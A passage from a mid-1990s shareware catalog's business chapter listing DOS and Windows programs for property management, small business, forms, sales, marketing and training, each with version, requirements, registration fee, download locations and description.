Home Refinancing + Compute time value savings from refinancing. See full + description on page 393. + + Product: OpenHome + Author: Temprano Software + Version: 3.10 (07-16-95) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; Hard + disk; HP LaserJet printer. + Strongly recommended: Mouse. + Registration fee: $47.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; OPNHME.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 6 (or contact userID 72614,43 + for assistance). + Download size: 297k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A selling property qualification generator for Windows 3.1. You + supply the selling property information and current rates for + fixed-, adjustable- and FHA-loans, and OpenHome generates an + attractive, easy-to-understand sheet which shows "cash to + close", "monthly payment" and "minimum monthly income" for up + to three different down payments of your choice. Can use any of + your Windows TrueType fonts and can even print the + qualification sheet in color, if you have a color printer. + + + Product: Property Master + Author: MSdataBase Solutions, 703-777-5660 + Version: 4.01 (05-20-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Mouse; Epson printer. Will not work with any version + of DOS 4.0. + Registration fee: $25.00 (add $5.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6); registration commissions. + Look for: PMAST41.ZIP on BBSs. + Download size: 498k (about 37 minutes with a 2400 baud modem) + Description: + A rental property database and rental management system for + landlords or property managers. Keep track of single family, + multiple family (apartments) or businesses. Associate landlords + + Chapter 7, "Business" 364 + + + + to properties; properties to other properties. Track income and + expenses by property (rent, repairs) & general expenses + (mileage, postage). Tax reports for Schedule E & 1099 expenses. + Keep track of deposits, refunds & leases. + + + Product: QUALITY MANAGEMENT SYSTEM + Author: PC-DSD, 800-427-8123 + Version: 3.3 (03-12-93) + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Registration fee: $175.00 + Registration benefits: Three months phone support, one year of + free updates. + Look for: QMV33U.ZIP on BBSs (call 714-681-6221 to download it at + no charge); QMV33U.ZIP on CompuServe in CIS:IBM forum LIBrary 2 + (or contact userID 70742,2473 for assistance). + Download size: 512k (about 38 minutes with a 2400 baud modem) + Description: + An accounting system for property management services. It + handles accounts payable and receivable, cash disbursements, + cash receipts, and debits and credits. Other features include a + business phone directory, memo writer, cardex, mailing lables, + tenant directory, check writer, rent payment journal, tenant + and building databases, 11 different print reports. + + + 7.9.11 Safety & fire protection + + Product: SCBA Trak + Author: Raymond A.J. Pesek, 216-225-0248 + Version: 2.40 (01-28-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Mouse; Network (LAN). + Registration fee: $35.00 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, fax, CompuServe, mail support. + Lifetime free upgrading allowed. + Look for: SCBATR24.ZIP on BBSs (call 719.591.7415 to download it + at no charge); SCBATR.ZIP on CompuServe in CIS:SAFETYNET forum + LIBrary 13 (or contact userID 72270,650 for assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Inventory & maintenance record system for Self-Contained + Breathing Apparatus and PASS units. Keeps track of repetitive + maintenance needs & costs for masks, back packs, bottles, & + PASS units. Gives early warning of packs coming due for flow + test, regulator overhaul, mask fit tests, etc. Warns of PASS + units coming due for battery change. Early warning of bottles + coming due for hydro testing or composite end of life. Many + reports, incl. budget projections, equipment lists, activity + reports, etc. + + Chapter 7, "Business" 365 + + + + 7.9.12 Small businesses + + Product: Book-It + Author: Instinctive Systems Ltd, +44(0)161-861-0043 + Version: 1.0a (04-25-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $95.00 (add $7.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited fax, CompuServe, mail support; + lifetime return policy; all ASP-wide offers (see page 6); + discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; BOOKIT.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 16 (or contact userID 100103,3722 + for assistance). + SWREG#: 5422 + Download size: 1570k (about 117 minutes with a 2400 baud modem) + Description: + Windows membership and activity / event booking system for + small hobby type clubs and organisations as well as larger + businesses such as activity clubs and holiday companies. + Facilities include - club / organisation enquiry and follow up, + membership administration, event or activity booking and + administration, credit note administration, activity supplier + and venue details, mail merge and label printing facilities, + flexible reporting facilities, contect sensitive help system. + + + Product: Business Base + Author: CQ Research Corp, 604-731-5583 + Version: 1.1 (04-28-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk; Mouse. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month limited return policy; site license; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + 1 free update disk(s) sent out. + Look for: BBASE.ZIP on BBSs; BBASE.ZIP on CompuServe in CIS:CIS + forum LIBrary 0 (or contact userID 70621,2170 for assistance). + Download size: 148k (about eleven minutes with a 2400 baud modem) + Description: + A business data system which provides a format for easy + electronic record keeping for all small and home business + operators. Recognizes that most people want help from their + computer, and offers real benefits of computer organization to + the millions of people who work for themselves. Includes + contact management, inventory, invoicing, and more. Try it! + + Chapter 7, "Business" 366 + + + + Product: Cash Control + A personal finance and business checkbook. See full + description on page 399. + + Product: Electronic Postal Window(tm) + US postal rates look-up program. See full description on + page 382. + + Product: Flexitime/Time Logging + Integrated time logging, recording, billing. See full + description on page 344. + + Product: Folders + Personal information manager network email. See full + description on page 170. + + Product: GARDENING BUSINESS + Author: Redei Enterprises, 310-832-6984 + Version: 1.1 (03-25-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; SVGA + monitor; Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: XMS memory; math coprocessor. + Registration fee: $125.00 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 2100k (about 156 minutes with a 2400 baud modem) + Description: + A business management software for small companies. It keeps + track of customers and their orders, prices, supplier + information, material & labor requirements, buy history and + cashflow. It automatically creates work orders, prints + invoices and reports. Designed for those small businesses + where practically no inventory is necessary. Can be used for + any small businesses with similar requirements. + + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 377. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 378. + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 171. + + Product: PC-AP + Accounts payable. See full description on page 316. + + Chapter 7, "Business" 367 + + + + Product: PC-AR + Accounts receivable. See full description on page 327. + + Product: PC-GL + General ledger. See full description on page 317. + + Product: PC-PR + Payroll writing. See full description on page 331. + + Product: PCINV + Invoice writing. See full description on page 318. + + Product: PostCardMaster + Postcard & mail handling system. See full description on + page 285. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 375. + + Product: Rosewood Journal + Invoice journal and accounts receivable. See full description + on page 318. + + Product: Sales & Samples + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.0 (04-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Strongly recommended: CGA monitor; Hercules monitor; Hard disk; + HP DeskJet printer; HP LaserJet printer; Epson printer; EMS + memory; XMS memory. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited fax, BBS, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6); registration commissions. 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: CTJISS.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJISS.* on CompuServe in CIS:WORK + forum LIBrary 9 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3481 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + A relational database application expressly developed to allow + the user to easily enter sales orders generated from a home + sales business selling cosmetics. It consists of two databases, + one for the customer specific information such as address, + phone etc., the other for the orders, samples and invoices that + automatically calculates totals including State sales tax if + applicable. The reports generated include totals for a + customer, totals by day, and group totals. Form is similar to + paper form. + + Chapter 7, "Business" 368 + + + + Product: SMALL BUSINESS ADVISOR + Author: RONIN Software, 206-391-4036 + Version: 94.4 (10-15-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. Does not + run on IBM PCjr. + Registration fee: $29.95 (add $5.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); 3 months + of unlimited phone, mail support; bonus utilities; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: SBA94_4.ZIP on BBSs (call 703-680-9269 to download it + at no charge). + PsL#: 11079 + Download size: 712k (about 53 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Unique expert program puts the tax/legal/business knowledge of + a Harvard lawyer, "Big 6" CPA at your disposal instantly. Very + easy to use! Gives your small business quick, current tax & + legal advice based on your state law on all fed/state taxes, + OSHA, ADA, envir. laws & more. Creates detailed customized + startup checklist for your business, your state in seconds. + Wide range of Q&A "consulting sessions" such as whether to + incorp. or elect Sub S. EZ-to-use income/estate/corp tax + modules. + + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 340. + + 7.9.13 Other + + Product: Book-It + Membership and activity booking system. See full description + on page 365. + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 366. + + Product: League Manager + Manages any youth sports organization. See full description on + page 646. + + Chapter 7, "Business" 369 + + + + Product: OMS (Organizational Mgmt System + Author: Torbert Data Systems, Inc., 804-488-5506 + Version: 2.3 (11-01-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk; Network + (LAN). + Registration fee: $359.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of tollfree 800# phone, fax, BBS, + CompuServe, mail support; royalty-free runtime license; site + license; discounts on other products; discounts on upgrades. + Look for: OMS23A.ZIP on BBSs (multiple files) (call 804-488-4146 + to download it at no charge); OMS23A.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 10 (multiple files) (or contact userID + 73747,2336 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Total solution for nonprofit organizations. Modules for + "members\prospects\other donors", "dues and dontributions", + "fund accounting" and much more. Great for any organization + that has a membership, collects dues or accepts contributions, + does fund raising, or uses fund accounting. Has powerful + maillist management. Great for clubs, religious groups, + political fund raising groups, college alumni associations, + homeowners associations, museums, performing arts groups, many + others. + + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 316. + + + 7.10 Forms generators + + Product: DR. FORM + Author: IrwinWare, 412-931-9577 + Version: 3.1 (03-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + phone, fax, CompuServe, mail support; 1-month return policy; + + Chapter 7, "Business" 370 + + + + bonus data; discounts on upgrades. 3-month free upgrading + allowed. + Look for: DRFORM31.ZIP on BBSs (call 508-368-7139 to download it + at no charge); DRFORM.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 6 (or contact userID 71045,222 for assistance). + SWREG#: 1250 + PsL#: 10925 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Shareware Magazine Editor's Choice Award. Make professional + quality forms easily. Full mouse support. Move, copy, draw + lines, etc. Automatic grid maker. Create master forms and fill + them in. Print on pre-printed forms and make templates. Context + sensitive help screens. Print bold, italic, etc. Supports dot + matrix & laser printers. Can print legal size forms (14") and + can print landscape on laser printers. Much more.... + + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 266. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 266. + + Product: Resume Master Deluxe + Easy-to-use but powerful resume creator. See full description + on page 247. + + Product: The Right Resume + Windows resume creator & job search package. See full + description on page 248. + + Product: WebForms + WWW forms generator! See full description on page 425. + + Chapter 7, "Business" 371 + + + + 7.10.1 Forms fillers + + Product: Form Editor (FED) + Author: MicroFox Company, 216-659-9489 + Version: 1.13 (05-05-95) + Needs: IBM PC, DOS 1.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: US$15.00 (add US$2.00 for shipping to U.S. + addresses) (add US$3.00 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + bonus utilities; all ASP-wide offers (see page 6); disks of + other shareware; discounts on other products. + Look for: FED113.ZIP on BBSs (call 216-661-9065 to download it at + no charge); FED113.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 73057,3113 for assistance); FED113.ZIP on + GEnie in IBMPC forum LIBrary 0. + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + Uses standard ASCII test files as forms. Sees underlines as + input fields. Prints forms to any printer. Saves forms or forms + and data. Can save data only for import to databases. + + + Product: PCForm + Author: CareWare, 916-265-8704 + Version: 3.0b (09-10-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Mouse. + Registration fee: $25.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 1-month + return policy; bonus utilities. + Look for: PCF30B.ZIP on BBSs; PCF30B.EXE on CompuServe in + CIS:IBMAPP forum LIBrary 6 (or contact userID 74270,516 for + assistance); PCFORM30.ZIP on GEnie in IBMPC forum LIBrary 15 + (or contact userID R.CROUCH1 for assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Offers an easy means for creating tailored made professional + looking forms, graphs, and line drawings. Features: ease of + use, word processing like entry and editing, on-line manual + viewer, HP LaserJet and multiple copies printing, comprehensive + file management, auto-tab for easy fill-in, two point line and + box drawing, block editing, multiple pages, math calculation + functions, pull down menus, mouse support, configurability, PIF + and ICO files, ASCII format for maximum compatibility and more. + + Chapter 7, "Business" 372 + + + + 7.10.2 Forms processing + + Product: Form Editor (FED) + Form Editor/Filler for standard text files. See full + description on page 371. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 115. + + Product: XPENS + Expense account reporting program. See full description on + page 319. + + + 7.11 Sales aids + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 362. + + Product: CATALOG-ON-A-DISK + Author: EmmaSoft Software Company, Inc., 607-533-4685 + Version: 4.00 (05-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk; Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $55.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, BBS, CompuServe, + newsletter, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: CATALG40.ZIP on BBSs (call 607-533-7072 to download it + at no charge); CATALG.ZIP on CompuServe in CIS:IDEAS forum + LIBrary 9 (or contact userID 71333,1577 for assistance); + CATALG40.ZIP on GEnie in HOSB forum LIBrary 12 (or contact + userID D.VEANER1 for assistance). + Download size: 357k (about 27 minutes with a 2400 baud modem) + Description: + Customers browse or search for products, order as they go + along, and print the order form with shipping and tax pre- + calculated to be sent by mail, fax, modem, or phone. The + compressed catalog fits a large number of products on disk and + provides security for prices and other data. You make the + catalog to best reflect your company. Flexible, easy to order + from, innovative. Submenus, size and color boxes, mix and + match products, info and coupons, many features. + + Chapter 7, "Business" 373 + + + + Product: DAYO PRICE BOOK + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOBE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOBE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A system of creating and maintaining specialized pricing for + your customer/clients. Special printouts (price books/catalogs) + may be printed to a standard printer, or to a Hewlett Packard + (tm) Laserjet or compatible. It requires the presence of DAYO + Inventory and DAYO POS programs/databases. Special price book + methods include fixed, margin/cost plus, and list/retail + discounts. + + + Product: Folders + Personal information manager network email. See full + description on page 170. + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 148. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 375. + + Product: WebForms + WWW forms generator! See full description on page 425. + + + 7.12 Marketing + + Product: Business Base + Business data manager for small/some business. See full + description on page 365. + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 171. + + Chapter 7, "Business" 374 + + + + Product: ProAct Contact Management + Author: ProDomus, Inc., 203-233-0705 + Version: 2.6 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Strongly recommended: EMS memory; XMS memory. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; discounts on upgrades. 12-month free upgrading allowed. + Look for: PRACT26*.ZIP on BBSs (multiple files) (call + 703-680-9269 to download it at no charge); PRACT.ZIP on + CompuServe in CIS:IBMAPP forum LIBrary 4 (or contact userID + 74650,3623 for assistance). + SWREG#: 2046 + PsL#: 11212 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Powerful home or business contact profiler, scheduler, and + merge letter/document word processor. Organize contacts by + company and name. Profile contacts by 10 categories. Apply + and batch process "action plans" for one or more contacts. + Includes three standard letter formats, user defined labels, + editable "Three Line Help", F1 Help, pick lists, and auto + dialing. Small demonstration program and tutorial included. + Multiple file sets so you can segregage home, office, or other + special groups. + + + Product: WebForms + WWW forms generator! See full description on page 425. + + + 7.13 Work-at-home + + See also: Home & hobby. + + Product: Back Soon! + Screen-saver/message-taking utility. See full description on + page 381. + + Product: Business Base + Business data manager for small/some business. See full + description on page 365. + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 166. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 169. + + Chapter 7, "Business" 375 + + + + Product: Dear Diary + Diary/daily journal. See full description on page 180. + + Product: Electronic Postal Window(tm) + US postal rates look-up program. See full description on + page 382. + + Product: HOME/OFFICE INVENTORY + Author: ProDomus, Inc., 203-233-0705 + Version: 1.0 (03-28-94) + Needs: IBM PC, DOS 3.3 or better. 520k RAM; EGA monitor; Hard + disk. + Registration fee: $21.50 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6). + Look for: HOI10A.EXE on BBSs (multiple files) (call 718-837-3236 + to download it at no charge); HOI.EXE on CompuServe in + CIS:IBMAPP forum LIBrary 0 (or contact userID 74650,3623 for + assistance). + SWREG#: 2342 + PsL#: 11236 + Download size: 690k (about 51 minutes with a 2400 baud modem) + Description: + An invaluable tool for recording and organizing personal or + business property data for insurance, tax, or maintenance + purposes. Includes inventory, insurance, business, and claim + information. Prepare claims including overhead and profit + calculations. Record warranty information. Track insurance + expirations, premiums, and monthly costs. Add notes to items, + claims, claim items, businesses, and dates. Mouse support, + color editing, redundant help systems. + + + Product: HortMan + Horticultural manager. See full description on page 604. + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 171. + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 155. + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 316. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 373. + + Chapter 7, "Business" 376 + + + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 282. + + Product: Rockford! + Design business cards in Windows. See full description on + page 239. + + + 7.14 Training & support aids + + See also: Computer programming, Hypertext/hypermedia; + Education, Computers. + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 236. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 236. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 525. + + Product: LEADING AND MANAGING OTHERS + Author: Chatfield Software, Inc., 216-632-5447 + Version: 1.0 (09-19-94) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + Mouse; sound card. MPC-compatible sound card. + Registration fee: $22.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + tollfree 800# phone, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 6); discounts on other + products. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: CSLMO.ZIP on BBSs; CSLMO.ZIP on CompuServe in CIS:IBM + APPS forum LIBrary 7 (or contact userID 71031,1036 for + assistance); CSLMO.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 705k (about 53 minutes with a 2400 baud modem) + Description: + A multimedia seminar on disk for leaders and managers at all + levels. Includes basic instruction in leadership and management + - plus "how-to" features, automatically scored quizzes, a self- + assessment, readings, and much more. + + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 437. + + Chapter 7, "Business" 377 + + + + Product: Q&A Study Aid [***] + Author: Quid Pro Quo Software, 319-378-9140 + Version: 5.2 (07-31-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. An ASCII editor program such as EDIT + (included with DOS 5.0 & later). + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $20.00 + Registration benefits: 3 months of unlimited CompuServe, mail + support. + Look for: QASA??.ZIP on BBSs (call 509-946-9848 to download it at + no charge); QASA??.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 11 (or contact userID 73760,2032 for assistance). + SWREG#: 502 + Download size: 214k (about 16 minutes with a 2400 baud modem) + Description: + A computer-based test creation and execution system. Test + databases of questions/answers are created with external editor + using easy rules. Has compiler and test interpreter, presents + compiled test, scores all answers and can record results in a + score file. All data encrypted or password protected. Scores + may be exported. Supports all question types but essay. Can + create random subsets. Has weighting, letter grade relations, + correct answer display with help, up to 20000 questions, more. + + + 7.14.1 Lecturing & slide shows + + See also: Writing applications, Creativity & brainstorming; + Graphics, Presentation graphics. + + Product: Lecture + Author: Barn Owl Software, 618-632-7345 + Version: 1.02 (12-14-92) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $29.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 6); discounts on other products. + Look for: LECT-102.ZIP on BBSs (call 618-632-2339 to download it + at no charge); LECTUR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 74017,1344 for assistance); + + Chapter 7, "Business" 378 + + + + LECTR100.ZIP on GEnie in IBMPC forum LIBrary 1 (or contact + userID R.ROSENBERGE for assistance). + SWREG#: 834 + PsL#: 10562 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Provides a much-needed text-based lecturing capability in + Windows. Replaces transparencies and foils! Other + presentation packages focus on graphics and overwhelm users + with complexities and high price tags. This program reads + standard ASCII files and displays text presentations in a + window. Mouse support lets you walk around freely as you "flip + slides." + + College teachers, businessmen, Toastmasters, and many others + who give text-based lectures will find this program extremely + useful. + + + Product: Prompter - Speaker's Utility + Author: OsoSoft, 805-528-1759 + Version: 1.2 (06-11-93) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Mouse; VBRUN300.DLL. + Registration fee: $25.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited tollfree 800# phone, fax, BBS, CompuServe, + mail support; lifetime return policy; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: PROMPTER.ZIP on BBSs (call 805-528-3753 to download it + at no charge); PRMPTR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 57k (about four minutes with a 2400 baud modem) + Description: + A complete speech editor and prompter for Windows. Create, + rehearse and deliver speeches and lectures just like the + professionals do. Any key pauses and restarts scrolling. Adjust + scroll rate while you speak. Elapsed time and estimated time + displays. Print speeches, too. Any font, any size, any scroll + rate. + + Chapter 7, "Business" 379 + + + + 7.14.2 Job interviewing + + Product: You're Hired! + Author: DataWell, 612-894-7088 + Version: 1.33 (02-05-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6); discounts on other products. 3-month free upgrading + allowed. + Look for: YH133.ZIP on BBSs (call 715-652-2758 to download it at + no charge); YHIRED.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 7 (or contact userID 73510,3077 for assistance). + PsL#: 10876 + Download size: 209k (about 16 minutes with a 2400 baud modem) + Description: + An informative and comprehensive job interview simulator that + provides realistic training to prepare you for your next job + interview. The Program asks you challenging questions and + records elapsed times as you verbally respond. If you need help + answering a question, press a key to receive professional + advice and to view your own notes. You can also add or change + the questions and advice, and create customized interviews that + ask only select questions. Practice anywhere with a printed + copy. + + + 7.14.3 "Help desk" applications + + See also: Computer programming, Programming utilities, Desktop + tools for programmers. + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 483. + + + 7.15 Simulators & what-ifs + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 204. + + Product: WALL STREET RAIDER + Stock market/corporate takeover simulation. See full + description on page 698. + + Chapter 7, "Business" 380 + + + + 7.16 Business utilities + + Product: Back Soon! + Author: Tay-Jee Software, 703-261-7023 + Version: 2.0 (09-01-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; EGA monitor; Hard + disk. + Strongly recommended: VGA monitor. + Registration fee: $19.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: BACKSN??.ZIP on BBSs; BACKSN.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 72330,1776 for + assistance). + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Designed for the busy home or office environment and has the + following features: + * "Blanks" text screens to prevent phosphor burn-in + * Displays a customized, scrolling message + * Accepts messages from visitors + * Allows you to retrieve, print, or store your messages + * Optionally plays music/displays graphics between messages + * Built-in event scheduler + * German/Spanish/English support + Turns your PC into a message center. Get rid of those notes + left on your desk. + + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 166. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 200. + + Product: Cards+More + Labels and cards printing. See full description on page 553. + + Product: DARN! Don't Forget! + Events Reminder for Windows. See full description on page 168. + + Product: DAYO SMART REPORTS + `Smart' reports & routines for DAYO. See full description on + page 386. + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 406. + + Chapter 7, "Business" 381 + + + + Product: Electronic Postal Window(tm) + Author: EmmaSoft Software Company, Inc., 607-533-4685 + Version: 1.6 (07-09-95) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; Mouse. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. 